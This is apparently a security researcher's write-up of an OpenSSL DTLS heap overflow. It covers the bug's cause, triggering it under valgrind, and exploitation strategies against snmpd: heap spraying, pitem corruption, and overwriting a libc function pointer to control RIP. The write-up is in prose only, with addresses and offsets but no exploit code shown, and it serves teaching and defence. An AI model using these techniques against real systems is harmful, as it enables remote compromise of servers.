Earlier this year, details of a remote code execution bug in OpenSSL’s DTLS implementation were published. The following is a look at the bug, its process and the different ways attackers might leverage it for exploitation:
Vulnerability
On a high level, the bug allows writing past the end of a buffer allocated in the heap, allowing application data or heap metadata to be overwritten. This leads to application crashes or remote code executions, at worst.
The bug is due to the way the OpenSSL DTLS parser handles fragmented handshakes. Specifically, it uses the message length specified in the initial fragment for the message buffer allocation, but it uses the message length specified in subsequent fragments to determine whether they are within range of the message.
Consider the following fragmented ClientHello message that triggers the bug:
When the initial ClientHello fragment is encountered, the parser will allocate a message buffer based on the specified message length (2, in this case). Next, the fragment data “A” (fragment offset = 0, fragment length = 1) is written to the message buffer:
Then, when the second ClientHello fragment is parsed, the fragment offset and fragment length is checked to determine whether they are within the range of the message length:
Notice that the check uses the message length specified in the current fragment being parsed (msg_hdr->msg_len) and not the message length specified in the initial fragment. Therefore, the check will pass, causing the fragment data “B” (fragment offset = 2, fragment length = 1) to be written past the end of the allocated message buffer:
As you may have observed, the bug is interesting in that an attacker has a relatively high control of where (fragment offset), what (fragment data) and how much data (fragment length) can be written.
Triggering
Now that we have an idea of what the bug is, let’s try to trigger it. For testing, an Ubuntu 14.04 x64 test VM is used. The libssl1.0.0 library is downgraded to a vulnerable version, and the package containing the debugging symbols for the libssl1.0.0 library (libssl1.0.0-dbg) is also installed. Also, a copy of a test server certificate from the OpenSSL project is downloaded to the current directory.
Finally, the /usr/bin/openssl tool is invoked with the arguments “s_server” and “-dtls1“; this causes the OpenSSL tool to listen on Port 4433 for DTLS connections. In the example below, the OpenSSL tool is run under valgrind so that the out-of-bounds write is immediately caught:
The valgrind log shows some important information, such as which code path caused the message buffer allocation (dtls1_reassemble_fragment() -> dtls1_hm_fragment_new()) and which code path caused the out-of-bounds write (dtls1_reassemble_fragment() -> dtls1_read_bytes()).
DTLS Exploitation
After understanding the bug, an interesting follow-up exercise is finding ways an attacker might leverage this bug to exploit a real service. This will serve as a great learning experience because it will teach us how attackers think, what their process is and what other weakness they might use to fully leverage the bug.
For this task, I first searched for a service that uses OpenSSL’s DTLS component for secure connections, eventually leading me to Net-SNMP’s snmpd. Note that the net-snmp build in Ubuntu has the DTLS option turned off by default, so I had to recompile the net-snmp package with additional options in order to enable DTLS.
Once a target service is running, the next step involves attaching to the process, setting breakpoints to the functions (see valgrind log) that were called when the message buffer was allocated and looking at the allocations that occur just after the message buffer allocation. Understanding the allocations that occur after the message buffer allocation allows us to determine which data structures will likely be allocated adjacent to the message buffer (assuming the allocations fit a large enough free chunk or are performed from the top chunk), and therefore, targeted for overwrite.
After a lot of experimentation, I eventually found that the following OpenSSL data structure, which is allocated almost immediately after the message buffer allocation, can be leveraged in order to convert the bug to a fairly limited “write arbitrary data to the address pointed to by pointers found in the process” exploit primitive:
In the context of DTLS, pitem is a linked list item that is used to track fragmented handshakes. The interesting field is the data field, which, in turn, points to a hm_fragment structure:
The hm_fragment structure contains information about the fragmented handshake message state, and more importantly, the message buffer pointer (hm_fragment.fragment).
Every time a handshake fragment parsed, the related pitem of the handshake is retrieved, pitem.data is casted to a hm_fragment* and the fragment data (which is controlled by attackers) is read into the buffer pointed to by hm_fragment.fragment:
Therefore, using the bug to point pitem.data somewhere in the process address space so that pitem.(hm_fragment*)data->fragment is aligned to a pointer, we can write arbitrary data to wherever pitem.(hm_fragment*)data->fragment points to.
To illustrate with an example, suppose the process address space contains the pointer 0x12345678 at address 0x401058. Assuming that the fragment field is at offset +0x58 of the hm_fragment structure, if we use the bug to point pitem.data to 0x401000, the parser will treat 0x401000 as a hm_fragment structure. Therefore, we will be able to write arbitrary data to 0x12345678 because it will be treated as the message buffer pointer:
We now have a fairly limited exploit primitive that allows us to leverage pointers in the process address space. The next question then is, “What can we do with it?” Again, after a lot of experimentation and trying out different ideas, I think these two are pretty interesting:
WriteN Primitive
Instead of leveraging existing pointers in the process address space, we will fill the heap with the address that we want to write data to. This involves spraying the heap with a target address. This is done via multiple DTLS connections that each send a large handshake message containing a repeating series of the target address (0x4141414141414141 in the example below). After the heap spray, the bug is used to point pitem.data to a hard-coded heap address (0x04141414 in the example), where I think (and hope) the series of 0x4141414141414141s are potentially written, causing pitem.(hm_fragment*)data->fragment to point to 0x4141414141414141:
As you may have guessed, the downside of this approach is that the hard-coded heap address is unreliable, which is true in the case of snmpd because several uncontrolled allocations will fill the heap in addition to the sprayed target address. Nonetheless, this is an interesting approach for further transforming the bug into a WriteN (write arbitrary data anywhere in the process address space) exploit primitive:
Execution (RIP) Control
Another approach is taking advantage of the absence of address randomization in cases where ASLR or PIE is disabled. In the case of Ubuntu, it turns out that PIE is not enabled for snmpd; this means that the snmpd executable is always mapped at a static address (0x400000):
Because of this, it is possible to leverage interesting pointers stored in the snmpd executable address range and write arbitrary data to where they point at. An example of this is the stderr pointer located at 0x606FE0 in the .got section of snmpd:
In turn, that pointer points somewhere in the writable .data section of libc:
Looking at the data near stderr in the libc, we can see that stderr+0x18 is an interesting function pointer — which is actually a function pointer dereferenced by malloc() when requesting additional memory from the system:
Therefore, for execution (RIP) control, we will use the bug to point pitem.data to 0x606F88 (0x606FE0-0x58) so that pitem.(hm_fragment*)data->fragment points to stderr in libc, causing a write to pitem.(hm_fragment*)data->fragment+0x18 with an arbitrary address. When malloc() dereferences the controlled function pointer, RIP control is achieved:
Conclusion
After reliably controlling RIP within the amount of time I allocated for research, I declared game over and moved on. However, that is not to say that the consequences of the bug are limited to the ones I described. A determined attacker with a lot of spare time can definitely write a complete and reliable remote exploit using the bug.
Also, looking back and thinking like an attacker, converting the bug into an exploit primitive involves a lot of experimentation. It is really a creative but long and laborious process. I lost track of how many times I had to restart the service, attach to the service, explore the heap, think, try an idea, crash the service and start the process all over again.
In the end, an attacker’s persistence is what transforms software bugs into working reliable exploits, and as software developers, it is good to always keep that in mind as we read and write our code, triage and fix our bugs and evaluate the use of exploit mitigations in our products.
Security Researcher, IBM X-Force